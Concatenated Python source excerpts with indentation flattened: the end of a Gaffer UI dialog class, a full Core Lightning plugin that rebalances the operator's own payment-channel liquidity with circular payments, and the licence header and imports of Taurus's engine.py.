self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ), scoped = True )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ), scoped = True )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None_ :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
rebalance.py | #!/usr/bin/env python3
from pyln.client import Plugin, Millisatoshi, RpcError
from threading import Thread, Lock
from datetime import timedelta
import time
import uuid
plugin = Plugin()
plugin.rebalance_stop = False
def setup_routing_fees(plugin, route, msatoshi):
delay = plugin.cltv_final
for r in reversed(route):
r['msatoshi'] = msatoshi.millisatoshis
r['amount_msat'] = msatoshi
r['delay'] = delay
channels = plugin.rpc.listchannels(r['channel'])
ch = next(c for c in channels.get('channels') if c['destination'] == r['id'])
fee = Millisatoshi(ch['base_fee_millisatoshi'])
# BOLT #7 requires fee >= fee_base_msat + ( amount_to_forward * fee_proportional_millionths / 1000000 )
fee += (msatoshi * ch['fee_per_millionth'] + 10**6 - 1) // 10**6 # integer math trick to round up
msatoshi += fee
delay += ch['delay']
def get_channel(plugin, payload, peer_id, scid, check_state: bool = False):
peer = plugin.rpc.listpeers(peer_id).get('peers')[0]
channel = next(c for c in peer['channels'] if c.get('short_channel_id') == scid)
if check_state:
if channel['state'] != "CHANNELD_NORMAL":
raise RpcError('rebalance', payload, {'message': 'Channel %s not in state CHANNELD_NORMAL, but: %s' % (scid, channel['state'])})
if not peer['connected']:
raise RpcError('rebalance', payload, {'message': 'Channel %s peer is not connected.' % scid})
return channel
def amounts_from_scid(plugin, scid):
channels = plugin.rpc.listfunds().get('channels')
channel = next(c for c in channels if c.get('short_channel_id') == scid)
our_msat = Millisatoshi(channel['our_amount_msat'])
total_msat = Millisatoshi(channel['amount_msat'])
return our_msat, total_msat
def peer_from_scid(plugin, short_channel_id, my_node_id, payload):
channels = plugin.rpc.listchannels(short_channel_id).get('channels')
for ch in channels:
if ch['source'] == my_node_id:
return ch['destination']
raise RpcError("rebalance", payload, {'message': 'Cannot find peer for channel: ' + short_channel_id})
def find_worst_channel(route):
if len(route) < 4:
return None
start_idx = 2
worst = route[start_idx]
worst_val = route[start_idx - 1]['msatoshi'] - route[start_idx]['msatoshi']
for i in range(start_idx + 1, len(route) - 1):
val = route[i - 1]['msatoshi'] - route[i]['msatoshi']
if val > worst_val:
worst = route[i]
worst_val = val
return worst
def cleanup(plugin, label, payload, rpc_result, error=None):
try:
plugin.rpc.delinvoice(label, 'unpaid')
except RpcError as e:
# race condition: waitsendpay timed out, but invoice get paid
if 'status is paid' in e.error.get('message', ""):
return rpc_result
if error is not None and isinstance(error, RpcError):
# unwrap rebalance errors as 'normal' RPC result
if error.method == "rebalance":
return {"status": "exception",
"message": error.error.get('message', "error not given")}
raise error
return rpc_result
# This function calculates the optimal rebalance amount
# based on the selected channels capacity and state.
# It will return a value that brings at least one of the channels to balance.
# It will raise an error, when this isnt possible.
#
# EXAMPLE
# |------------------- out_total -------------|
# OUT -v => |-------- out_ours -------||-- out_theirs --| => +v
#
# IN +v <= |-- in_ours --||---------- in_theirs ---------| <= -v
# |--------- in_total --------------------------|
#
# CHEAP SOLUTION: take v_min from 50/50 values
# O* vo = out_ours - (out_total/2)
# I* vi = (in_total/2) - in_ours
# return min(vo, vi)
#
# ... and cover edge cases with exceeding in/out capacity or negative values.
def calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload):
out_ours, out_total = int(out_ours), int(out_total)
in_ours, in_total = int(in_ours), int(in_total)
in_theirs = in_total - in_ours
vo = int(out_ours - (out_total / 2))
vi = int((in_total / 2) - in_ours)
# cases where one option can be eliminated because it exceeds other capacity
if vo > in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi > out_ours and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# cases where one channel is still capable to bring other to balance
if vo < 0 and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi < 0 and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# when both options are possible take the one with least effort
if vo > 0 and vo < in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(min(vi, vo))
raise RpcError("rebalance", payload, {'message': 'rebalancing these channels will make things worse'})
class NoRouteException(Exception):
pass
def getroute_basic(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
try:
""" This does not make special assumptions and tries all routes
it gets. Uses less CPU and does not filter any routes.
"""
return plugin.rpc.getroute(targetid,
fromid=fromid,
exclude=excludes,
msatoshi=msatoshi,
maxhops=plugin.maxhops,
riskfactor=10, cltv=9)
except RpcError as e:
# could not find route -> change params and restart loop
if e.method == "getroute" and e.error.get('code') == 205:
raise NoRouteException
raise e
def getroute_iterative(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
""" This searches for 'shorter and bigger pipes' first in order
to increase likelyhood of success on short timeout.
Can be useful for manual `rebalance`.
"""
try:
return plugin.rpc.getroute(targetid,
fromid=fromid,
exclude=excludes,
msatoshi=msatoshi * plugin.msatfactoridx,
maxhops=plugin.maxhopidx,
riskfactor=10, cltv=9)
except RpcError as e:
# could not find route -> change params and restart loop
if e.method == "getroute" and e.error.get('code') == 205:
# reduce _msatfactor to look for smaller channels now
plugin.msatfactoridx -= 1
if plugin.msatfactoridx < 1:
# when we reached neutral msat factor:
# increase _maxhops and restart with msatfactor
plugin.maxhopidx += 1
plugin.msatfactoridx = plugin.msatfactor
# abort if we reached maxhop limit
if plugin.maxhops > 0 and plugin.maxhopidx > plugin.maxhops:
raise NoRouteException
raise e
def getroute_switch(method_name):
switch = {
"basic": getroute_basic,
"iterative": getroute_iterative
}
return switch.get(method_name, getroute_iterative)
@plugin.method("rebalance")
def rebalance(plugin, outgoing_scid, incoming_scid, msatoshi: Millisatoshi = None,
retry_for: int = 60, maxfeepercent: float = 0.5,
exemptfee: Millisatoshi = Millisatoshi(5000),
getroute_method=None):
"""Rebalancing channel liquidity with circular payments.
This tool helps to move some msatoshis between your channels.
"""
if msatoshi:
msatoshi = Millisatoshi(msatoshi)
retry_for = int(retry_for)
maxfeepercent = float(maxfeepercent)
if getroute_method is None:
getroute = plugin.getroute
else:
getroute = getroute_switch(getroute_method)
exemptfee = Millisatoshi(exemptfee)
payload = {
"outgoing_scid": outgoing_scid,
"incoming_scid": incoming_scid,
"msatoshi": msatoshi,
"retry_for": retry_for,
"maxfeepercent": maxfeepercent,
"exemptfee": exemptfee
}
my_node_id = plugin.rpc.getinfo().get('id')
outgoing_node_id = peer_from_scid(plugin, outgoing_scid, my_node_id, payload)
incoming_node_id = peer_from_scid(plugin, incoming_scid, my_node_id, payload)
get_channel(plugin, payload, outgoing_node_id, outgoing_scid, True)
get_channel(plugin, payload, incoming_node_id, incoming_scid, True)
out_ours, out_total = amounts_from_scid(plugin, outgoing_scid)
in_ours, in_total = amounts_from_scid(plugin, incoming_scid)
# If amount was not given, calculate a suitable 50/50 rebalance amount
if msatoshi is None:
msatoshi = calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload)
plugin.log("Estimating optimal amount %s" % msatoshi)
# Check requested amounts are selected channels
if msatoshi > out_ours or msatoshi > in_total - in_ours:
raise RpcError("rebalance", payload, {'message': 'Channel capacities too low'})
plugin.log(f"starting rebalance out_scid:{outgoing_scid} in_scid:{incoming_scid} amount:{msatoshi}", 'debug')
route_out = {'id': outgoing_node_id, 'channel': outgoing_scid, 'direction': int(not my_node_id < outgoing_node_id)}
route_in = {'id': my_node_id, 'channel': incoming_scid, 'direction': int(not incoming_node_id < my_node_id)}
start_ts = int(time.time())
label = "Rebalance-" + str(uuid.uuid4())
description = "%s to %s" % (outgoing_scid, incoming_scid)
invoice = plugin.rpc.invoice(msatoshi, label, description, retry_for + 60)
payment_hash = invoice['payment_hash']
# The requirement for payment_secret coincided with its addition to the invoice output.
payment_secret = invoice.get('payment_secret')
rpc_result = None
excludes = [my_node_id] # excude all own channels to prevent shortcuts
nodes = {} # here we store erring node counts
plugin.maxhopidx = 1 # start with short routes and increase
plugin.msatfactoridx = plugin.msatfactor # start with high capacity factor
# and decrease to reduce WIRE_TEMPORARY failures because of imbalances
# 'disable' maxhops filter if set to <= 0
# I know this is ugly, but we don't ruin the rest of the code this way
if plugin.maxhops <= 0:
plugin.maxhopidx = 20
# trace stats
count = 0
count_sendpay = 0
time_getroute = 0
time_sendpay = 0
try:
while int(time.time()) - start_ts < retry_for and not plugin.rebalance_stop:
count += 1
try:
time_start = time.time()
r = getroute(plugin,
targetid=incoming_node_id,
fromid=outgoing_node_id,
excludes=excludes,
msatoshi=msatoshi)
time_getroute += time.time() - time_start
except NoRouteException:
# no more chance for a successful getroute
rpc_result = {'status': 'error', 'message': 'No suitable routes found'}
return cleanup(plugin, label, payload, rpc_result)
except RpcError as e:
# getroute can be successful next time with different parameters
if e.method == "getroute" and e.error.get('code') == 205:
continue
else:
raise e
route_mid = r['route']
route = [route_out] + route_mid + [route_in]
setup_routing_fees(plugin, route, msatoshi)
fees = route[0]['amount_msat'] - msatoshi
# check fee and exclude worst channel the next time
# NOTE: the int(msat) casts are just a workaround for outdated pylightning versions
if fees > exemptfee and int(fees) > int(msatoshi) * maxfeepercent / 100:
worst_channel = find_worst_channel(route)
if worst_channel is None:
raise RpcError("rebalance", payload, {'message': 'Insufficient fee'})
excludes.append(worst_channel['channel'] + '/' + str(worst_channel['direction']))
continue
rpc_result = {"sent": msatoshi + fees, "received": msatoshi, "fee": fees, "hops": len(route),
"outgoing_scid": outgoing_scid, "incoming_scid": incoming_scid, "status": "complete",
"message": f"{msatoshi + fees} sent over {len(route)} hops to rebalance {msatoshi}"}
plugin.log("Sending %s over %d hops to rebalance %s" % (msatoshi + fees, len(route), msatoshi), 'debug')
for r in route:
plugin.log(" - %s %14s %s" % (r['id'], r['channel'], r['amount_msat']), 'debug')
time_start = time.time()
count_sendpay += 1
try:
plugin.rpc.sendpay(route, payment_hash, payment_secret=payment_secret)
running_for = int(time.time()) - start_ts
result = plugin.rpc.waitsendpay(payment_hash, max(retry_for - running_for, 0))
time_sendpay += time.time() - time_start
if result.get('status') == "complete":
rpc_result["stats"] = f"running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}"
return cleanup(plugin, label, payload, rpc_result)
except RpcError as e:
time_sendpay += time.time() - time_start
plugin.log(f"maxhops:{plugin.maxhopidx} msatfactor:{plugin.msatfactoridx} running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}", 'debug')
# plugin.log(f"RpcError: {str(e)}", 'debug')
# check if we ran into the `rpc.waitsendpay` timeout
if e.method == "waitsendpay" and e.error.get('code') == 200:
raise RpcError("rebalance", payload, {'message': 'Timeout reached'})
# check if we have problems with our own channels
erring_node = e.error.get('data', {}).get('erring_node')
erring_channel = e.error.get('data', {}).get('erring_channel')
erring_direction = e.error.get('data', {}).get('erring_direction')
if erring_channel == incoming_scid:
raise RpcError("rebalance", payload, {'message': 'Error with incoming channel'})
if erring_channel == outgoing_scid:
raise RpcError("rebalance", payload, {'message': 'Error with outgoing channel'})
# exclude other erroring channels
if erring_channel is not None and erring_direction is not None:
excludes.append(erring_channel + '/' + str(erring_direction))
# count and exclude nodes that produce a lot of errors
if erring_node and plugin.erringnodes > 0:
if nodes.get(erring_node) is None:
nodes[erring_node] = 0
nodes[erring_node] += 1
if nodes[erring_node] >= plugin.erringnodes:
excludes.append(erring_node)
except Exception as e:
return cleanup(plugin, label, payload, rpc_result, e)
rpc_result = {'status': 'error', 'message': 'Timeout reached'}
return cleanup(plugin, label, payload, rpc_result)
def a_minus_b(a: Millisatoshi, b: Millisatoshi):
# a minus b, but Millisatoshi cannot be negative
return a - b if a > b else Millisatoshi(0)
def must_send(liquidity):
# liquidity is too high, must send some sats
return a_minus_b(liquidity["min"], liquidity["their"])
def should_send(liquidity):
# liquidity is a bit high, would be good to send some sats
return a_minus_b(liquidity["ideal"]["their"], liquidity["their"])
def could_send(liquidity):
# liquidity maybe a bit low, but can send some more sats, if needed
return a_minus_b(liquidity["our"], liquidity["min"])
def must_receive(liquidity):
# liquidity is too low, must receive some sats
return a_minus_b(liquidity["min"], liquidity["our"])
def should_receive(liquidity):
# liquidity is a bit low, would be good to receive some sats
return a_minus_b(liquidity["ideal"]["our"], liquidity["our"])
def could_receive(liquidity):
# liquidity maybe a bit high, but can receive some more sats, if needed
return a_minus_b(liquidity["their"], liquidity["min"])
def get_open_channels(plugin: Plugin):
channels = []
for peer in plugin.rpc.listpeers()["peers"]:
for ch in peer["channels"]:
if ch["state"] == "CHANNELD_NORMAL" and not ch["private"]:
channels.append(ch)
return channels
def check_liquidity_threshold(channels: list, threshold: Millisatoshi):
# check if overall rebalances can be successful with this threshold
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
required = Millisatoshi(0)
for ch in channels:
required += min(threshold, ch["total_msat"] / 2)
return required < our and required < total - our
def get_enough_liquidity_threshold(channels: list):
low = Millisatoshi(0)
biggest_channel = max(channels, key=lambda ch: ch["total_msat"])
high = biggest_channel["total_msat"] / 2
while True:
mid = (low + high) / 2
if high - low < Millisatoshi("1sat"):
break
if check_liquidity_threshold(channels, mid):
low = mid
else:
high = mid
return mid / 2
def get_ideal_ratio(channels: list, enough_liquidity: Millisatoshi):
# ideal liquidity ratio for big channels:
# small channels should have a 50/50 liquidity ratio to be usable
# and big channels can store the remaining liquidity above the threshold
assert len(channels) > 0
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
chs = list(channels) # get a copy!
while len(chs) > 0:
ratio = int(our) / int(total)
smallest_channel = min(chs, key=lambda ch: ch["total_msat"])
if smallest_channel["total_msat"] * min(ratio, 1 - ratio) > enough_liquidity:
break
min_liquidity = min(smallest_channel["total_msat"] / 2, enough_liquidity)
diff = smallest_channel["total_msat"] * ratio
diff = max(diff, min_liquidity)
diff = min(diff, smallest_channel["total_msat"] - min_liquidity)
our -= diff
total -= smallest_channel["total_msat"]
chs.remove(smallest_channel)
assert 0 <= ratio and ratio <= 1
return ratio
def feeadjust_would_be_nice(plugin: Plugin):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjust"]
if len(commands) == 1:
msg = plugin.rpc.feeadjust()
plugin.log(f"Feeadjust succeeded: {msg}")
else:
plugin.log("The feeadjuster plugin would be useful here")
def get_max_amount(i: int, plugin: Plugin):
return max(plugin.min_amount, plugin.enough_liquidity / (4**(i + 1)))
def get_max_fee(plugin: Plugin, msat: Millisatoshi):
# TODO: sanity check
return (plugin.fee_base + msat * plugin.fee_ppm / 10**6) * plugin.feeratio
def get_chan(plugin: Plugin, scid: str):
for peer in plugin.rpc.listpeers()["peers"]:
if len(peer["channels"]) == 0:
continue
# We might have multiple channel entries ! Eg if one was just closed
# and reopened.
for chan in peer["channels"]:
if chan.get("short_channel_id") == scid:
return chan
def liquidity_info(channel, enough_liquidity: Millisatoshi, ideal_ratio: float):
liquidity = {
"our": channel["to_us_msat"],
"their": channel["total_msat"] - channel["to_us_msat"],
"min": min(enough_liquidity, channel["total_msat"] / 2),
"max": max(a_minus_b(channel["total_msat"], enough_liquidity), channel["total_msat"] / 2),
"ideal": {}
}
liquidity["ideal"]["our"] = min(max(channel["total_msat"] * ideal_ratio, liquidity["min"]), liquidity["max"])
liquidity["ideal"]["their"] = min(max(channel["total_msat"] * (1 - ideal_ratio), liquidity["min"]), liquidity["max"])
return liquidity
def wait_for(success, timeout: int = 60):
# cyclical lambda helper
# taken and modified from pyln-testing/pyln/testing/utils.py
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
return False
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
return True
def wait_for_htlcs(plugin, failed_channels: list, scids: list = None):
# HTLC settlement helper
# taken and modified from pyln-testing/pyln/testing/utils.py
result = True
peers = plugin.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel.get('short_channel_id') not in scids:
continue
if channel.get('short_channel_id') in failed_channels:
result = False
continue
if 'htlcs' in channel:
if not wait_for(lambda: len(plugin.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0):
failed_channels.append(channel.get('short_channel_id'))
plugin.log(f"Timeout while waiting for htlc settlement in channel {channel.get('short_channel_id')}")
result = False
return result
def maybe_rebalance_pairs(plugin: Plugin, ch1, ch2, failed_channels: list):
scid1 = ch1["short_channel_id"]
scid2 = ch2["short_channel_id"]
result = {"success": False, "fee_spent": Millisatoshi(0)}
if scid1 + ":" + scid2 in failed_channels:
return result
# check if HTLCs are settled
if not wait_for_htlcs(plugin, failed_channels, [scid1, scid2]):
return result
i = 0
while not plugin.rebalance_stop:
liquidity1 = liquidity_info(ch1, plugin.enough_liquidity, plugin.ideal_ratio)
liquidity2 = liquidity_info(ch2, plugin.enough_liquidity, plugin.ideal_ratio)
amount1 = min(must_send(liquidity1), could_receive(liquidity2))
amount2 = min(should_send(liquidity1), should_receive(liquidity2))
amount3 = min(could_send(liquidity1), must_receive(liquidity2))
amount = max(amount1, amount2, amount3)
if amount < plugin.min_amount:
return result
amount = min(amount, get_max_amount(i, plugin))
maxfee = get_max_fee(plugin, amount)
plugin.log(f"Try to rebalance: {scid1} -> {scid2}; amount={amount}; maxfee={maxfee}")
start_ts = time.time()
try:
res = rebalance(plugin, outgoing_scid=scid1, incoming_scid=scid2,
msatoshi=amount, retry_for=1200, maxfeepercent=0,
exemptfee=maxfee)
if not res.get('status') == 'complete':
raise Exception # fall into exception handler below
except Exception:
failed_channels.append(scid1 + ":" + scid2)
# rebalance failed, let's try with a smaller amount
while (get_max_amount(i, plugin) >= amount and
get_max_amount(i, plugin) != get_max_amount(i + 1, plugin)):
i += 1
if amount > get_max_amount(i, plugin):
continue
return result
result["success"] = True
result["fee_spent"] += res["fee"]
htlc_start_ts = time.time()
# wait for settlement
htlc_success = wait_for_htlcs(plugin, failed_channels, [scid1, scid2])
current_ts = time.time()
res["elapsed_time"] = str(timedelta(seconds=current_ts - start_ts))[:-3]
res["htlc_time"] = str(timedelta(seconds=current_ts - htlc_start_ts))[:-3]
plugin.log(f"Rebalance succeeded: {res}")
if not htlc_success:
return result
ch1 = get_chan(plugin, scid1)
assert ch1 is not None
ch2 = get_chan(plugin, scid2)
assert ch2 is not None
return result
def maybe_rebalance_once(plugin: Plugin, failed_channels: list):
channels = get_open_channels(plugin)
for ch1 in channels:
for ch2 in channels:
if ch1 == ch2:
continue
result = maybe_rebalance_pairs(plugin, ch1, ch2, failed_channels)
if result["success"] or plugin.rebalance_stop:
return result
return {"success": False, "fee_spent": Millisatoshi(0)}
def feeadjuster_toggle(plugin: Plugin, new_value: bool):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjuster-toggle"]
if len(commands) == 1:
msg = plugin.rpc.feeadjuster_toggle(new_value)
return msg["forward_event_subscription"]["previous"]
else:
return True
def rebalanceall_thread(plugin: Plugin):
if not plugin.mutex.acquire(blocking=False):
return
try:
start_ts = time.time()
feeadjuster_state = feeadjuster_toggle(plugin, False)
channels = get_open_channels(plugin)
plugin.enough_liquidity = get_enough_liquidity_threshold(channels)
plugin.ideal_ratio = get_ideal_ratio(channels, plugin.enough_liquidity)
plugin.log(f"Automatic rebalance is running with enough liquidity threshold: {plugin.enough_liquidity}, "
f"ideal liquidity ratio: {plugin.ideal_ratio * 100:.2f}%, "
f"min rebalancable amount: {plugin.min_amount}, "
f"feeratio: {plugin.feeratio}")
failed_channels = []
success = 0
fee_spent = Millisatoshi(0)
while not plugin.rebalance_stop:
result = maybe_rebalance_once(plugin, failed_channels)
if not result["success"]:
break
success += 1
fee_spent += result["fee_spent"]
feeadjust_would_be_nice(plugin)
feeadjuster_toggle(plugin, feeadjuster_state)
elapsed_time = timedelta(seconds=time.time() - start_ts)
plugin.rebalanceall_msg = f"Automatic rebalance finished: {success} successful rebalance, {fee_spent} fee spent, it took {str(elapsed_time)[:-3]}"
plugin.log(plugin.rebalanceall_msg)
finally:
plugin.mutex.release()
@plugin.method("rebalanceall")
def rebalanceall(plugin: Plugin, min_amount: Millisatoshi = Millisatoshi("50000sat"), feeratio: float = 0.5):
"""Rebalance all unbalanced channels if possible for a very low fee.
Default minimum rebalancable amount is 50000sat. Default feeratio = 0.5, half of our node's default fee.
To be economical, it tries to fix the liquidity cheaper than it can be ruined by transaction forwards.
It may run for a long time (hours) in the background, but can be stopped with the rebalancestop method.
"""
# some early checks before we start the async thread
if plugin.mutex.locked():
return {"message": "Rebalance is already running, this may take a while. To stop it use the cli method 'rebalancestop'."}
channels = get_open_channels(plugin)
if len(channels) <= 1:
return {"message": "Error: Not enough open channels to rebalance anything"}
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
min_amount = Millisatoshi(min_amount)
if total - our < min_amount or our < min_amount:
return {"message": "Error: Not enough liquidity to rebalance anything"}
# param parsing ensure correct type
plugin.feeratio = float(feeratio)
plugin.min_amount = min_amount
# run the job
t = Thread(target=rebalanceall_thread, args=(plugin, ))
t.start()
return {"message": f"Rebalance started with min rebalancable amount: {plugin.min_amount}, feeratio: {plugin.feeratio}"}
@plugin.method("rebalancestop")
def rebalancestop(plugin: Plugin):
"""It stops the ongoing rebalanceall.
"""
if not plugin.mutex.locked():
if plugin.rebalanceall_msg is None:
return {"message": "No rebalance is running, nothing to stop."}
return {"message": f"No rebalance is running, nothing to stop. "
f"Last 'rebalanceall' gave: {plugin.rebalanceall_msg}"}
plugin.rebalance_stop = True
plugin.mutex.acquire(blocking=True)
plugin.rebalance_stop = False
plugin.mutex.release()
return {"message": plugin.rebalanceall_msg}
def health_score(liquidity):
if int(liquidity["ideal"]["our"]) == 0 or int(liquidity["ideal"]["their"]) == 0 or int(liquidity["min"]) == 0:
return 0
score_our = int(liquidity["our"]) / int(liquidity["ideal"]["our"])
score_their = int(liquidity["their"]) / int(liquidity["ideal"]["their"])
# distance from ideal liquidity (between 50 and 100)
score = min(score_our, score_their) * 50 + 50
coefficient_our = int(liquidity["our"]) / int(liquidity["min"])
coefficient_their = int(liquidity["their"]) / int(liquidity["min"])
# distance from minimal liquidity as a coefficient (between 0 and 1)
coefficient = min(coefficient_our, coefficient_their, 1)
return score * coefficient
def get_avg_forward_fees(plugin: Plugin, intervals):
now = time.time()
max_interval = max(intervals)
total = [0] * len(intervals)
fees = [0] * len(intervals)
res = [0] * len(intervals)
all_forwards = list(filter(lambda fwd: fwd.get("status") == "settled"
and fwd.get("resolved_time", 0)
+ max_interval * 60 * 60 * 24 > now,
plugin.rpc.listforwards()["forwards"]))
# build intermediate result per interval
for fwd in all_forwards:
for idx, i in enumerate(intervals):
if now > fwd["resolved_time"] + i * 60 * 60 * 24:
continue
total[idx] += fwd["out_msat"]
fees[idx] += fwd["fee_msat"]
# return average intermediate
for idx, i in enumerate(res):
res[idx] = fees[idx] / total[idx] * 10**6
return res
@plugin.method("rebalancereport")
def rebalancereport(plugin: Plugin):
"""Show information about rebalance
"""
res = {}
res["rebalanceall_is_running"] = plugin.mutex.locked()
res["getroute_method"] = plugin.getroute.__name__
res["maxhops_threshold"] = plugin.maxhops
res["msatfactor"] = plugin.msatfactor
res["erringnodes_threshold"] = plugin.erringnodes
channels = get_open_channels(plugin)
health_percent = 0.0
if len(channels) > 1:
enough_liquidity = get_enough_liquidity_threshold(channels)
ideal_ratio = get_ideal_ratio(channels, enough_liquidity)
res["enough_liquidity_threshold"] = enough_liquidity
res["ideal_liquidity_ratio"] = f"{ideal_ratio * 100:.2f}%"
for ch in channels:
liquidity = liquidity_info(ch, enough_liquidity, ideal_ratio)
health_percent += health_score(liquidity) * int(ch["total_msat"])
health_percent /= int(sum(ch["total_msat"] for ch in channels))
else:
res["enough_liquidity_threshold"] = Millisatoshi(0)
res["ideal_liquidity_ratio"] = "0%"
res["liquidity_health"] = f"{health_percent:.2f}%"
invoices = plugin.rpc.listinvoices()['invoices']
rebalances = [i for i in invoices if i.get('status') == 'paid' and i.get('label').startswith("Rebalance")]
total_fee = Millisatoshi(0)
total_amount = Millisatoshi(0)
res["total_successful_rebalances"] = len(rebalances)
for r in rebalances:
try:
pay = plugin.rpc.listpays(r["bolt11"])["pays"][0]
total_amount += pay["amount_msat"]
total_fee += pay["amount_sent_msat"] - pay["amount_msat"]
except Exception:
res["total_successful_rebalances"] -= 1
res["total_rebalanced_amount"] = total_amount
res["total_rebalance_fee"] = total_fee
if total_amount > Millisatoshi(0):
res["average_rebalance_fee_ppm"] = round(total_fee / total_amount * 10**6, 2)
else:
res["average_rebalance_fee_ppm"] = 0
avg_forward_fees = get_avg_forward_fees(plugin, [1, 7, 30])
res['average_forward_fee_ppm_1d'] = avg_forward_fees[0]
res['average_forward_fee_ppm_7d'] = avg_forward_fees[1]
res['average_forward_fee_ppm_30d'] = avg_forward_fees[2]
return res
@plugin.init()
def init(options, configuration, plugin):
config = plugin.rpc.listconfigs()
plugin.cltv_final = config.get("cltv-final")
plugin.fee_base = Millisatoshi(config.get("fee-base"))
plugin.fee_ppm = config.get("fee-per-satoshi")
plugin.mutex = Lock()
plugin.maxhops = int(options.get("rebalance-maxhops"))
plugin.msatfactor = float(options.get("rebalance-msatfactor"))
plugin.erringnodes = int(options.get("rebalance-erringnodes"))
plugin.getroute = getroute_switch(options.get("rebalance-getroute"))
plugin.rebalanceall_msg = None
plugin.log(f"Plugin rebalance initialized with {plugin.fee_base} base / {plugin.fee_ppm} ppm fee "
f"cltv_final:{plugin.cltv_final} "
f"maxhops:{plugin.maxhops} "
f"msatfactor:{plugin.msatfactor} "
f"erringnodes:{plugin.erringnodes} "
f"getroute: {plugin.getroute.__name__}")
plugin.add_option(
"rebalance-getroute",
"iterative",
"Getroute method for route search can be 'basic' or 'iterative'."
"'basic': Tries all routes sequentially. "
"'iterative': Tries shorter and bigger routes first.",
"string"
)
plugin.add_option(
"rebalance-maxhops",
"5",
"Maximum number of hops for `getroute` call. Set to 0 to disable. "
"Note: Two hops are added for own nodes input and output channel. "
"Note: Routes with a 8 or more hops have less than 3% success rate.",
"string"
)
plugin.add_option(
"rebalance-msatfactor",
"4",
"Will instruct `getroute` call to use higher requested capacity first. "
"Note: This will decrease to 1 when no routes can be found.",
"string"
)
plugin.add_option(
"rebalance-erringnodes",
"5",
"Exclude nodes from routing that raised N or more errors. "
"Note: Use 0 to disable.",
"string"
)
plugin.run()
|
engine.py | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import hashlib
import json
import logging
import math
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from abc import abstractmethod
from collections import namedtuple, defaultdict
from distutils.version import LooseVersion
from json import encoder
import yaml
from yaml.representer import SafeRepresenter
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException, InvalidTaurusConfiguration
from bzt import ToolError
from bzt.requests_model import RequestParser
from bzt.six import numeric_types, string_types, text_type, PY2, UserDict, parse, reraise
from bzt.utils import PIPE, shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient
from bzt.utils import load_class, to_json, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import str_representer, Environment, RequiredTool
